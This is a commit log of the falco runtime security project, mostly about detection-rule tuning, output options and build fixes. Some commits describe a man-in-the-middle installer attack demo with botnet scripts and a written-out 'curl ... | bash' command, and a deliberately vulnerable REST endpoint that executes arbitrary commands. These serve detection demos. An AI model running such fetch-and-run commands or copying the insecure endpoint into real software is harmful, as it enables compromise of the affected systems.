falcosecurity/falco

.travis.yml
README.md
test/falco_trace_regression.sh

Add minimal travis.yml file that builds and packages falco. No actual
tests yet.

Add minimal travis support.

---

userspace/falco/falco.cpp

delete(NULL) is ok so don't bother protecting it.
This fixes https://github.com/draios/falco/issues/80.

Don't null-check inspector.

---

CMakeLists.txt
scripts/CMakeLists.txt
userspace/falco/CMakeLists.txt

Make sure that references to variables that may be paths (which in turn
may contain spaces) are quoted, so cmake won't break on the spaces.
This fixes https://github.com/draios/falco/issues/79.
@henridf

Quote path variables that may contain spaces.

---

.gitignore
rules/falco_rules.yaml
test/falco_test.py
test/run_regression_tests.sh
userspace/falco/lua/rule_loader.lua

Update fbash rules to use proc.sname instead of proc.aname and to rely
on sessions instead of process ancestors.
I also wanted to add details on the address/port being listened to but
that's blocked on https://github.com/draios/falco/issues/86.
Along with this change, there are new positive trace files
installer-bash-starts-network-server.scap and
installer-bash-starts-session.scap that test these updated rules.

Update fbash rules to use proc.sname.

---

README.md

Split up the content from the README into individual pages in the
wiki--that's been updated in a separate change.

Migrate README contents to wiki.

---

test/falco_test.py
test/run_regression_tests.sh
userspace/falco/falco.cpp
userspace/falco/formats.cpp
userspace/falco/formats.h
userspace/falco/lua/output.lua
userspace/falco/lua/rule_loader.lua

Instead of using sysdig's json output, which only contains the fields
from the format string without any formatting text, use the string
output to build a json object containing the format string, rule name,
severity, and the event time (converted to a json-friendly ISO8601).
This fixes https://github.com/draios/falco/issues/82.

Add more useful json output.

---

examples/mitm-sh-installer/README.md
examples/mitm-sh-installer/botnet_master.sh
examples/mitm-sh-installer/demo.yml
examples/mitm-sh-installer/evil_web_root/botnet_client.py
examples/mitm-sh-installer/fbash
examples/mitm-sh-installer/nginx.conf
examples/mitm-sh-installer/web_root/install-software.sh
rules/falco_rules.yaml

Adding docker-compose based example of man-in-the-middle attack against
installation scripts and how it can be detected using sysdig falco.
The docker-compose environment starts a good web server, compromised
nginx installation, evil web server, and a copy of sysdig falco. The
README walks through the process of compromising a client by using curl
http://localhost/get-software.sh | bash and detecting the compromise
using ./fbash.
The fbash program included in this example fixes https://github.com/draios/falco/issues/46.

Docker-compose environment for mitm example.

---

examples/nodejs-bad-rest-api/README.md
examples/nodejs-bad-rest-api/demo.yml
examples/nodejs-bad-rest-api/package.json
examples/nodejs-bad-rest-api/server.js

Simple docker-compose environment that starts a simple express server
with a poorly-designed /api/exec/<cmd> endpoint that executes arbitrary
commands, and uses falco to detect running bash.

Example showing running bash via a bad rest api.

---

rules/falco_rules.yaml
userspace/falco/lua/parser.lua

https://github.com/draios/sysdig/pull/623 adds support for a startswith
operator to allow for string prefix matching. Modify the parser to
recognize that operator, and use that operator for rules that really
want to check the beginning of a pathname, directory, etc. to make them
faster and avoid FPs.

Utilize sysdig's startswith operator.

---

rules/falco_rules.yaml
userspace/falco/lua/compiler.lua
userspace/falco/lua/rule_loader.lua

Once sysdig adds support for handling "in (...)" filter expressions as
set membership tests, it will be advantageous to combine lists of items
together into a single list so they can all be checked in a single set
membership test.
This commit adds support for a new yaml item type "list" containing a
field "name" and field "items" containing a list of items. These are
represented as a yaml list, which allows yaml to handle some of the
initial parsing with the list items maintained natively in lua.
When parsing macro or rule conditions, replace all references to a list
name with the list items as a comma separated string.
Modify the falco rules to switch to lists whenever possible. The
new convention is to use the suffix _binaries for lists of program names
and _procs for macros that define …

Add list support to rules file.

---

.travis.yml
rules/falco_rules.yaml
test/falco_test.py
test/run_regression_tests.sh

Changes to rules to improve performance and reduce FPs.

Rule perf updates

---

rules/falco_rules.yaml

In modify_binary_dirs, move the bin_dir_rename check before modify,
which is just a bunch of evt.type checks and is handled by evttype
filters.
Change create_files_below_dev to put the directory check first.

More perf-related rule updates.

---

falco.yaml
userspace/falco/configuration.cpp
userspace/falco/lua/output.lua

Add a new output type "program" that writes a formatted event to a
configurable program, using io.popen().
Each notification results in one invocation of the program.
This fixes #99.

Add ability to write output to a program

---

test/cpu_monitor.sh
test/run_performance_tests.sh

When the root directory contains the name 'agent', assume we're running
an agent and provide appropriate configuration and run the agent using
dragent.
You can make autodrop or falco configurable within the agent via
--agent-autodrop and --falco-agent.
Also include some other small changes like timestamping the json points.
@luca3m wanna double check the agent config?

Add ability to run agent for performance tests.

---

userspace/falco/falco.cpp
userspace/falco/lua/compiler.lua
userspace/falco/lua/rule_loader.lua
userspace/falco/rules.cpp
userspace/falco/rules.h

New command line option 'A', related to the boolean all_events instructs
falco to run on all events, and not just those without the EF_DROP_FALCO
flag set.
When all_events is true, the checks for ignored events/syscalls are
skipped when loading rules.
This fixes #102.

Add ability to run on all events.

---

CHANGELOG.md
README.md

Fill in release notes for 0.3.0, with links to relevant PRs/github
issues.
Note that 0.3.0 is the latest release.
I also updated the wiki pages to reflect 0.3.0, but that's a separate
repo.

Update docs for 0.3.0 release.

---

docker/dev/Dockerfile
docker/stable/Dockerfile

gnupg2 is missing on latest debian:unstable.

Fix docker builds.

---

examples/nodejs-bad-rest-api/server.js

Instead, run it directly. This avoids false positives when running
non-bash commands and false negatives when trying to run a shell.

Don't run the spawned program in a shell.

---

rules/falco_rules.yaml

Docker 1.12 split docker into docker and dockerd, so add dockerd as a
docker binary. Also be consistent about using docker_binares instead of
just references to docker.
Also add ldconfig as a program that can write to files below /etc.

Eliminate FPs.

---

.gitignore
docker/event-generator/Dockerfile
docker/event-generator/Makefile
docker/event-generator/event_generator.cpp
rules/falco_rules.yaml

Add a test program and corresponding docker image that performs actions that falco can detect. Useful for demo purposes.

Add event simulator

---

rules/falco_rules.yaml
test/falco_tests.yaml.in
test/rules/rule_names_with_spaces.yaml

Related to discussion on https://github.com/draios/agent/pull/160,
verifying we can have rule names with spaces, and then changing rule
names to be more human readable.

Make rule names human readable

---

rules/falco_rules.yaml
test/confs/file_output.yaml
test/confs/program_output.yaml
test/falco_test.py
test/falco_tests.yaml.in
test/run_regression_tests.sh
userspace/falco/lua/output.lua

Fix configurable outputs, this was broken when making the falco engine changes.
Also add regression tests to verify in the future.

Fix outputs

---

test/falco_tests.yaml.in
test/rules/single_rule_enabled_flag.yaml
userspace/engine/lua/rule_loader.lua
userspace/engine/rules.cpp
userspace/engine/rules.h

Add ability to flag any rule as explicitly enabled (or disabled).

Add enabled flag

---

rules/falco_rules.yaml
userspace/engine/lua/compiler.lua
userspace/engine/lua/parser.lua

New falco rules related to container state. Also including some small improvements to compiler output.
This depends on draios/sysdig#655.

Addl container rules

---

rules/falco_rules.yaml

The new privileged falco rule was noisy when running kubernetes, which
can run privileged. Add it to the trusted_containers list.
Also eliminate a couple spurious warnings related to spawning shells in
containers.

Reduce FPs related to Kubernetes.

---

docker/dev/Dockerfile
docker/stable/Dockerfile

As luca did for the agent, install gcc 4.9 from the debian jesse
repository, as it has been removed from unstable.
@luca3m @gianlucaborello this should fix the docker hub build failures.

Install gcc-4.9 from Debian Jessie repositories

---

userspace/engine/lua/compiler.lua
userspace/engine/lua/parser.lua
userspace/engine/lua/rule_loader.lua

Make changes to the lua-specific rule parser/compiler to handle the
pmatch operator.

Add the new pmatch operator.

---

docker/event-generator/event_generator.cpp
userspace/engine/config_falco_engine.h.in
userspace/engine/falco_common.cpp
userspace/engine/falco_common.h
userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/lua/compiler.lua
userspace/engine/lua/parser.lua
userspace/engine/lua/rule_loader.lua
userspace/engine/rules.cpp
userspace/engine/rules.h
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/formats.cpp
userspace/falco/formats.h
userspace/falco/logger.cpp
userspace/falco/logger.h
userspace/falco/lua/output.lua
userspace/falco/lua/test.lua

Add comment blocks to all source code w/ our gpl copyright notice.

Add license comments to all source code.

---

docker/dev/Dockerfile
docker/stable/Dockerfile
falco.yaml

Add jq to our docker images, which makes it easier to post to slack webhooks.

Add jq to docker

---

rules/falco_rules.yaml
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h

Add support for -pc/-pk/-pm/-k/-m options that do the same thing as the 
sysdig options--change output formats to have container-friendly
information, pulling information when necessary from kubernetes/mesos.
See commits for more details.
This fixes #131.

Add k8s/mesos/container info to rule outputs.

---

userspace/falco/falco.cpp

The logic for detecting if a file exists was backwards. It would treat a
file as existing if it could *not* be opened. Reverse that logic so it
works.
This fixes https://github.com/draios/falco/issues/135.

Fix logic for detecting conf files.

---

rules/falco_rules.yaml

Add a new list k8s_binaries and allow those binaries to do things like
setns/spawn shells. It's not the case that all of these binaries
actually do these things, but keeping it as a single list makes
management easier.

Add k8s binaries as trusted programs

---

rules/falco_rules.yaml

Make sure falco doesn't detect the things draios-agent does as
suspicious. It's possible that you might run open source falco alongside
sysdig cloud.
App checks spawned by sysdig cloud binaries might also change namespace,
so also allow children of sysdigcloud binaries to call setns.

Rule fixes for dragent.

---

docker/dev/docker-entrypoint.sh
docker/stable/docker-entrypoint.sh

This helps when running on a system which has the module loaded, but getting
access to the module file is hard for some reason.  Since I know that the right
version of the module is loaded I just want Falco to connect.
I tested this with this run command:
docker run -e SYSDIG_SKIP_LOAD=1 -it -v /dev:/host/dev -v /proc:/host/proc --privileged falco
And it successfully connected to Sysdig and started printing out warnings for my
system.

Added envvar SYSDIG_SKIP_LOAD to Dockerfile to skip kernel module manipulation

---

CMakeLists.txt

Honor a USE_BUNDLED_DEPS option for third-party libraries which can be
applied globally. There are also USE_BUNDLED_XXX options that can be
used individually for each library.
Verified that this works by first building with USE_BUNDLED_DEPS=ON (the
default), installing external packages ncurses-dev libssl-dev
libcurl4-openssl-dev so CMake's find_package could use them, modifying
the CMakeLists.txt to add "PATHS ${PROJECT_BINARY_DIR}/..." options to
each find_path()/find_library() command to point to the previously
installed third party libraries. It found them as expected.
The sysdig fix in https://github.com/draios/sysdig/pull/672 forced this
change, but it does also happens to fix a falco feature request
https://github.com/draios/falco/issues/144.

Honor USE_BUNDLED_DEPS option for third-party libs

---

CMakeLists.txt
userspace/engine/config_falco_engine.h.in

Instead of having FALCO_SHARE_DIR be a relative path, fully specify it
by prepending CMAKE_INSTALL_PREFIX in the top level CMakeLists.txt and
don't prepend CMAKE_INSTALL_PREFIX in config_falco_engine.h.in. This
makes it consistent with its use in the agent.
This fixes https://github.com/draios/agent/issues/260.

Fully specify FALCO_SHARE_DIR.

---

userspace/engine/lua/compiler.lua
userspace/engine/lua/rule_loader.lua

Related to the changes in https://github.com/draios/agent/pull/267,
improve error messages when trying to load sets of rules with errors:
- Check that yaml parsing of rules_content actually resulted in
something.
- Return an error for rules that have an empty name.
- Return an error for yaml objects that aren't a rule/macro/list.
- When compiling, don't print an error message, simply return one,
including a wrapper "can not compile ..." string.

Improve error messages when loading rules.

---

test/falco_test.py
test/falco_tests.yaml.in
test/rules/invalid_rule_output.yaml
userspace/engine/CMakeLists.txt
userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/formats.cpp
userspace/engine/formats.h
userspace/engine/lua/rule_loader.lua
userspace/engine/rules.cpp
userspace/engine/rules.h
userspace/falco/CMakeLists.txt
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/lua/output.lua

These changes ensure that if a rule's output field is invalid, it is detected at rule load time instead of when the rule is triggered.

Container info in engine

---

rules/falco_rules.yaml

DNF is the present package management for fedora. RHEL/CentOS will likely follow.  Tested on Fedora 24.

Adding DNF as non-alerting for RPM and package management

---

test/run_performance_tests.sh
userspace/falco/CMakeLists.txt
userspace/falco/falco.cpp
userspace/falco/statsfilewriter.cpp
userspace/falco/statsfilewriter.h

With -s, periodically fetch capture stats from the inspector and write
them to the provided file.
Separate class StatsFileWriter handles the details. It does rely on a
timer + SIGALRM handler so you can only practically create a single
object, but it does keep the code/state separate.
The output format has a sample number, the set of current stats, and a
delta with the difference from the prior sample.

Add ability to write capture stats to a file.

---

test/plot-live.r

New argument --metric, which can be cpu|drops, controls whether to graph
cpu usage or event drop percentage. Titles/axis labels/etc. change
appropriately.

Modify plotting script to handle drop stats.

---

userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/lua/output.lua

Instead of creating a formatter for each event, cache them and create
them only when needed. A new function output_cleanup cleans up the
cached formatters.

Cache formatters.

---

falco.yaml
userspace/falco/configuration.cpp
userspace/falco/logger.cpp
userspace/falco/logger.h

Previously, log messages had levels, but it only influenced the level
argument passed to syslog(). Now, add the ability to control log level
from falco itself.
New falco.yaml argument "log_level" can be one of the strings
corresponding to the well-known syslog levels, which is converted to a
syslog-style level as integer.
In falco_logger::log(), skip messages below the specified level.

Add log levels.

---

rules/falco_rules.yaml

Add google_containers/kube-proxy as a trusted image (can be run
privileged, can mount sensitive filesystems). While our k8s deployments
run kube-proxy via the hyperkube image, evidently it's sometimes run via
its own image.
This is one of the fixes for #156.
Also update the output message for this rule.

Make google_containers/kube-proxy a trusted image.

---

falco.yaml
userspace/engine/CMakeLists.txt
userspace/engine/token_bucket.cpp
userspace/engine/token_bucket.h
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h

Add rate limiting for notifications, so even if a rule is extremely noisy it won't result in a flood of notifications.
This is one of the fixes for #156.

Rate limit notifications

---

userspace/engine/token_bucket.cpp
userspace/engine/token_bucket.h

sinsp_utils::get_current_time_ns() has the same purpose as
get_epoch_ns(), and now that we're including the token bucket in
falco_engine, it's easy to package the dependency. So use that function
instead.
@luca3m this is what we discussed. It also requires some sysdig cleanups. There will be a separate PR for that.

Use sinsp utils version of get time.

---

rules/falco_rules.yaml

fail2ban spawns a shell to adjust iptables in order to ban/unban IP addresses.

Add fail2ban-server as spawn shell trusted binary

---

rules/falco_rules.yaml

We need to get a CLA sign-off.

Revert "Add fail2ban-server as spawn shell trusted binary"

---

rules/falco_rules.yaml

fail2ban spawns shells to modify iptables
falco-CLA-1.0-signed-off-by: Jonathan Coetzee <jon@thancoetzee.com>

Add fail2ban-server as trusted binary

---

rules/falco_rules.yaml

SSH'ing into an Ubuntu 16.04 box triggers a bunch of "Sensitive file opened for reading by non-trusted program" errors caused by systemd. Not sure if this should replace or compliment systemd-logind?
falco-CLA-1.0-signed-off-by: Jonathan Coetzee <jon@thancoetzee.com>

Add systemd as a login binary

---

rules/falco_rules.yaml

Periodically both apt and apt-get will spawn shells to update success timestamps and motd.
```
Warning Shell spawned by untrusted binary (user=root shell=sh parent=apt-get cmdline=sh -c touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true) container=host (id=host)
Warning Shell spawned by untrusted binary (user=root shell=sh parent=apt-get cmdline=sh -c /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true) container=host (id=host)
Warning Shell spawned by untrusted binary (user=root shell=sh parent=apt cmdline=sh -c touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true) container=host (id=host)
Warning Shell spawned by untrusted binary (user=root shell=sh parent=apt cmdline=sh -c /usr/lib/update-notifier/update-motd-updates-available …
```

Add apt and apt-get as trusted binaries to spawn shells

---

test/falco_tests.yaml.in
test/rules/override_list.yaml
test/rules/override_macro.yaml
test/rules/override_nested_list.yaml
test/rules/override_rule.yaml
test/rules/single_rule.yaml
userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/lua/rule_loader.lua
userspace/engine/rules.cpp
userspace/engine/rules.h

Allow a subsequent yaml file to override a list, macro, or rule specified in a prior yaml file.
This fixes #176.

Allow overrides

---

rules/falco_rules.yaml

Add cchh/sysdig as a trusted container. We'll probably remove this once
the next agent release occurs that has the fix
https://github.com/draios/falco/pull/177.
Also switch to using pmatch (parallel prefix search) to make the rule
cleaner and faster.

Add cchh/sysdig as a trusted container.

---

test/falco_test.py
test/falco_tests.yaml.in
test/rules/null_output_field.yaml
userspace/engine/lua/rule_loader.lua
userspace/falco/lua/output.lua

Prefix output strings with * so they are always permissive in the
engine.
In falco outputs, which adds its own prefix, remove any leading * before
adding the custom prefix.

Prefix outputs with * within the engine.

---

rules/falco_rules.yaml

For customers who use
https://github.com/kubernetes/contrib/tree/master/exec-healthz to
perform liveness checking, exechealthz will spawn shells in a
container. Add it to the k8s_binaries list.

Add exechealthz as a k8s binary.

---

rules/falco_rules.yaml

Feedback from a falco user:
--
to more findings from last night:
logrotate cronjob (Debian default):
Shell spawned by untrusted binary (user=root shell=sh parent=logrotate cmdline=sh -c invoke-rc.d rsyslog rotate > /dev/null logrotate_script /var/log/syslog)
passwd cronjob (Debian default):
Sensitive file opened for reading by non-trusted program (user=root name=cmp command=cmp -s shadow.bak /etc/shadow file=/etc/shadow)
--
New macro cmp_cp_by_passwd allows cmp/cp to be run by passwd to examine
sensitive files. Add logrotate as a program that can spawn a shell.
Also do some cleanups, moving items to lists and splitting long
single-line conditions into multiple lines.

Avoid FPs resulting from ubuntu weekly cron jobs

---

CMakeLists.txt
docker/local/Dockerfile
docker/local/docker-entrypoint.sh

Update third-party libraries to address security vulnerabilities.

Update third party libs to address security vulnerabilities

---

rules/falco_rules.yaml

Changes to allow shells spawned by ansible. In general this is actually
pretty difficult--on the remote managed machine, ansible performs
actions simply by running python over ssh without any explicit ansible
helper or command line.
One (weak) hint is that the python scripts being run are usually under a
directory with ansible in the name. So use that as the basis for a macro
ansible_running_python. In turn, that macro is used as a negative
condition for the run shell untrusted rule.
This is a pretty fragile and easily exploited condition, so add a note
to the macro saying so.

Allow shells spawned by ansible.

---

rules/falco_rules.yaml

Several changes to reduce spurious alerts when managing machines via
ansible:
- Add ansible_running_python (that is, ansible-spawned python scripts)
as scripts that can read sensitive files and write below
/etc. Notably this is the user ansible module.
- Also add comments to ansible_running_python suggesting users make it
more strict by specifically naming the root directory for ansible
scripts.
Also other changes to reduce FPs:
- add apt-add-reposit, apt-auto-remova (truncation intentional),
apt-get, apt, apt-key as package management programs, and add package
management binaries to the set of shell spawners. The overlapping
binaries that were in known_shell_spawn_binaries were removed.
- add passwd_binaries, gpg, insserv, apparmor_parser, update-mime,
tzdata.{config,postinst}, …

Several changes to reduce FPs

---

rules/falco_rules.yaml

We had added this image while the changes in
https://github.com/draios/falco/pull/177 made it to everyone. This is in
a release now, so we'll remove it from the rule set.

Remove cchh image.

---

rules/falco_rules.yaml

- Add a second possible location for denyhosts
- Add PM2 (http://pm2.keymetrics.io/) as a shell spawner.
- There was a bug in use of ansible_running_python. We actually need
two variants depending on whether ansible is the parent or current
process. parent_ansble_running_python is used for Run shell
untrusted, ansible_running_python is used for other rules.

Address more spurious alerts

---

CMakeLists.txt

I am not sure whether it's a good idea requiring `autoreconf` or it would be better to add also that as an ExternalProject.

CMakeLists: add dependencies to lyaml project (fix #130)

---

docker/event-generator/event_generator.cpp
examples/nodejs-bad-rest-api/demo.yml
rules/falco_rules.yaml
test/falco_test.py
test/falco_tests.yaml.in

Several changes to improve the experience of working with falco-event-generator. Also add a trace file from falco-event-generatore to regression tests so we continue to detect all its activity.

Demo improvements

---

rules/falco_rules.yaml

@juju4, here's a PR that merges most of the changes you suggested with the changes I had already made. 
Generally, if you have sysdig trace files you can share for any of
these cases, it would be very useful. I can add them to the suite of
regression tests.
Here are some notes on the differences between the two PRs:
- I addressed linux-image-4.4 somewhat differently, by having a macro parent_linux_image_upgrade_script which looks for linux-image-* and allows it to run shells. I'm guessing the only FP you noticed was linux-image-4.4 spawning shells?
- I'm assuming critical-stack is short for critical-stack-intel? From what I could see while running it, the only setuid it does is to drop privileges from root. Given that, the current Non sudo setuid rule should not trigger. Am I missing …

Rule updates related to other security products

---

rules/falco_rules.yaml

- Add flanneld as a privileged container.
- Add parentheses grouping around many of the "x running y"
containers. I haven't found this strictly necessary with their
current use in rules, but this ensures they will be isolated when
used.
- Allow denyhosts to spawn shells--it runs iptables to add/remove hosts
from its deny list.

Additional changes to reduce FPs.

---

rules/falco_rules.yaml

- Sometimes systemd changes its process name to '(systemd)', probably
for a forked daemon process. Add that version to login_binaries.
- Add sv (part of runit) as a program that can write below /etc.
- Allow all /dev/tty* files by moving /dev/tty from the list to a
"startswith /dev/tty" condition.

More changes to address FPs.

---

userspace/engine/formats.cpp
userspace/engine/formats.h
userspace/engine/rules.cpp
userspace/falco/lua/output.lua

Use the sinsp_evt_formatter_cache added in
https://github.com/draios/sysdig/pull/771 instead of a local cache. This
simplifies the lua side quite a bit, as it only needs to call
format_output(), and clean up everything via free_formatters() in
output_cleanup().
On the C side, use a sinsp_evt_formatter object and use it in
format_event().

Use formatter cache

---

rules/falco_rules.yaml

Add support for gitlab omnibus containers/pod (https://docs.gitlab.com/omnibus/README.html). 
Example events:
```
Shell spawned in a container other than entrypoint (user=<NA> k8s_gitlab.XXX (id=YYYY) shell=sh parent=sshd cmdline=sh -c /opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell key-42)
Shell spawned in a container other than entrypoint (user=<NA> k8s_gitlab.XXX (id=YYY) shell=sh parent=git cmdline=sh -c git-upload-pack '/var/opt/gitlab/git-data/repositories/example/demo_service.git' git-upload-pack '/var/opt/gitlab/git-data/repositories/example/demo_service.git')
```
Might make sense to create a bunch of dedicated gitlab rules as my approach is pretty generic.

Add support for gitlab omnibus containers/pod

---

examples/k8s-using-daemonset/README.md
examples/k8s-using-daemonset/falco-daemonset.yaml
examples/k8s-using-daemonset/falco-event-generator-deployment.yaml

Add example k8s yaml files that allow for running falco as a k8s
daemonset and the event generator as a deployment, running on 1 node.
Falco is configured to send its output to a slack webhook corresponding
to the #demo-falco-alerts channel on sysdig's public slack channel.
The output is is k8s friendly by using -pk, -k (k8s api server), and
-K (credentials to communicate with api server).

Add falco,event generator files for k8s.

---

rules/falco_rules.yaml

Example event:
```
Shell spawned in a container other than entrypoint (user=<NA> k8s_rabbitmq.af7a0ada_rabbitmq-1_data_XXX (id=YYY) shell=sh parent=erl_child_setup cmdline=sh -c exec /bin/sh -s unix:cmd)
```

Add erl_child_setup to shell spawning binaries in a container.

---

examples/k8s-using-daemonset/falco-daemonset.yaml

If a daemonset specifies a command, this overrides the entrypoint. In
falco's case, the entrypoint handles the details of loading the kernel
driver, so specifying a command accidently prevents the driver from
being loaded.
This happens to work if you had a previously loaded sysdig_probe driver
lying around.
The fix is to specify args instead. In this case, the driver will be
loaded via the entrypoint.
This fixes https://github.com/draios/falco/issues/225.

Make sure entrypoint runs for docker pod.

---

rules/falco_rules.yaml

This ensures that interpreted php,perl,etc code run by apache won't be
able to spawn shells, either.
This fixes https://github.com/draios/falco/issues/231.

Don't allow apache2 to spawn shells in containers

---

userspace/engine/token_bucket.cpp
userspace/engine/token_bucket.h

Allow now to be externally provided to avoid unnecessary gettimeofday()
calls.

Allow for an external clock in token bucket.

---

userspace/engine/token_bucket.cpp

We were dividing the tokens gained by the rate instead of multiplying.

Fix token bucket rate

---

rules/falco_rules.yaml

Recent gitlab versions introduce a new command: gitlab-mon
Example alert:
```
Shell spawned in a container other than entrypoint (user=<NA> k8s_gitlab.XXXX_gitlab-YYYYY-zdl1l_default_E7B5CE6A-5F96-4771-A20E-275F2C9C199C (id=275F2C9C199C) shell=sh parent=gitlab-mon cmdline=sh -c pgrep -f "git-upload-pack --stateless-rpc")
```

Add gitlab-mon command

---

rules/falco_rules.yaml

Add a new falco rule "Terminal shell in container" that looks for shells
spawned in a container with an attached terminal. This is similar to the
existing "Run shell in container" rule, but doesn't have as many
exceptions as we expect this to be even less rare.

Add rule for shell with terminal in container.

---

rules/falco_rules.yaml

Allow the sysdig cloud agent to call setns to collect java process
metrics.
We've also seen cases where some of the intermediate processes created
below runc appear to call setns. It appears that this only should happen
if some events (like the execve that spawns the intermediate processes)
are lost, but just to be safe allow processes starting with "runc:" to
call setns.

Address some setns FPs.

---

examples/nodejs-bad-rest-api/server.js

Explicitly spawn program via shell.

---

userspace/engine/lua/parser.lua

When parsing condition expressions, if the type of an ast node is
String (aka quoted string), don't trim whitespace from the value. This
ensures that conditions that want to match exact strings e.g. command
lines with leading/trailing spaces will work properly.
This fixes #253.

Don't trim quoted strings

---

userspace/engine/lua/compiler.lua
userspace/engine/lua/rule_loader.lua

Also validate macros when they are parsed. Macros are also validated as
a part of rules being parsed, but it's possible to have an individual
rules file containing only macros, or a macro not explicitly tied to any
rule. In this case, it's useful to be able to check the macro to see if
it contains dangling macro references.

Also validate macros at parse time.

---

test/falco_tests.yaml
test/rules/list_order.yaml
test/rules/list_sub_bare.yaml
test/rules/list_sub_end.yaml
test/rules/list_sub_front.yaml
test/rules/list_sub_mid.yaml
test/rules/list_sub_whitespace.yaml
test/rules/list_substring.yaml
test/rules/macro_order.yaml
test/rules/rule_order.yaml
userspace/engine/lua/compiler.lua

Improve list substitution so a list name foo doesn't get inserted into a string my_foo. Also improve some unit tests.

Better list substitution

---

.travis.yml

This handles cases where multiple sets of kernel headers are installed.

Use uname -r for kernel modules

---

userspace/engine/lua/compiler.lua
userspace/engine/lua/parser.lua
userspace/engine/lua/rule_loader.lua

If in yaml, the output field is folded-style aka:
output: <
some multi-line
output here
The unfolded string will have a trailing newline. Remove it.

Remove trailing newlines from output

---

test/falco_tests.yaml
test/rules/list_append.yaml
test/rules/list_append_failure.yaml
test/rules/list_append_false.yaml
userspace/engine/lua/rule_loader.lua

This fixes https://github.com/draios/falco/issues/255.

Mergable lists

---

examples/nodejs-bad-rest-api/demo.yml
examples/nodejs-bad-rest-api/server.js

Won't conflict with k8s api server port.

Switch port to 8181.

---

rules/falco_rules.yaml

Keepalived can execute shell scripts during master/backup transitions.

Add keepalived to list of shell spawning binaries

---

test/falco_tests.yaml
test/rules/macro_append.yaml
test/rules/macro_append_failure.yaml
test/rules/macro_append_false.yaml
test/rules/rule_append.yaml
test/rules/rule_append_failure.yaml
test/rules/rule_append_false.yaml
userspace/engine/lua/rule_loader.lua

Add the ability to append to rules/macros, like we already do with
lists. For rules/macros, if the object has an append: true key, the
condition value is appended to the condition of an existing rule/macro
with the same name.
Like lists, it's an error to specify append: true without there being an
existing rule/macro.
Also add tests that test the same kind of things we did for lists:
- That append: true really does append
- That append: false overwrites the rule/macro
- That it's an error to append with a prior rule/macro existing.

Add ability to append to rules/macros

---

falco.yaml
test/falco_test.py
test/falco_tests.yaml
userspace/engine/falco_common.cpp
userspace/engine/falco_common.h
userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/lua/rule_loader.lua
userspace/engine/rules.cpp
userspace/engine/rules.h
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/lua/output.lua

Add ability to only run rules with a minimum priority.
This fixes https://github.com/draios/falco/issues/62.

Run rules by priority

---

CMakeLists.txt
cpack/debian/conffiles
falco.yaml
rules/CMakeLists.txt
rules/falco_rules.local.yaml
test/falco_test.py
userspace/engine/config_falco_engine.h.in
userspace/falco/configuration.cpp
userspace/falco/configuration.h

These changes allow for a local rules file that will be preserved across
upgrades and allows the main rules file to be overwritten across upgrades.
- Move all config/rules files below /etc/falco/
- Add a "local rules" file /etc/falco/falco_rules.local.yaml. The intent
is that it contains modifications/deltas to the main rules file
/etc/falco/falco_rules.yaml. falco_rules.yaml can be overwritten on
upgrade, while falco.yaml/falco_rules.local.yaml are
flagged as config files and not overwritten on upgrade.
- Change the handling of the config item "rules_file" in falco.yaml to
allow a list of files. By default, this list contains:
[/etc/falco/falco_rules.yaml, /etc/falco/falco_rules.local.yaml].
This fixes https://github.com/draios/falco/issues/268.

Rework config file handling

---

userspace/engine/formats.cpp

When json output is set, add a sub-object called output_fields to the
json output that contains the individual templated fields from the
output string. Makes it easier to parse those fields.
This fixes https://github.com/draios/falco/issues/261.

Add individual event fields to json output

---

falco.yaml
userspace/falco/configuration.cpp
userspace/falco/lua/output.lua

Add the ability to keep files/programs open across multiple notifications. This fixes https://github.com/draios/falco/issues/279 (or at least allows using "nc <host> <port> with a single connection).

Long lived program output

---

CMakeLists.txt
userspace/engine/config_falco_engine.h.in

Needed when embedding in other products.

add an absolute-path version of FALCO_SHARE_DIR

---

falco.yaml
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/lua/output.lua

A new falco.yaml option buffered_outputs, also controlled by
-U/--unbuffered, sets unbuffered outputs for the output methods. This is
especially useful with keep_alive files/programs where you want the
output right away.
Also add cleanup methods for the output channels that ensure output to
the file/program is flushed and closed.
This fixes the other half of https://github.com/draios/falco/issues/279.

Add ability to make outputs unbuffered

---

CMakeLists.txt
userspace/engine/CMakeLists.txt

The rules CMakeLists.txt, which controls the installation of the falco
rules files, was in the engine CMakeLists.txt, which meant that programs
that included the engine would also include rules files.
This may not always be desired, so move the rules CMakeLists.txt to the
main falco CMakeLists.txt instead.

Move rules cmakefiles from engine to falco itself

---

userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h

Add the ability to return the specific event types that are relevant for
a given ruleset. Allows pre-filtering based on ruleset outside the
engine.
This depends on https://github.com/draios/sysdig/pull/958.

Expose evttypes for ruleset

---

rules/falco_rules.yaml

Rename user_known_container_shell_spawn_binaries to
user_known_shell_spawn_binaries (the container distinction doesn't exist
any longer) and add it as an exception for run shell untrusted.
That way others can easily exclude shell spawning programs in a second
rules file.

Add ability to override shell spawning binaries

---

rules/falco_rules.yaml

Several additional changes from secure customers.

Rule updates vdec

---

examples/k8s-using-daemonset/README.md
examples/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml
examples/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
examples/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml
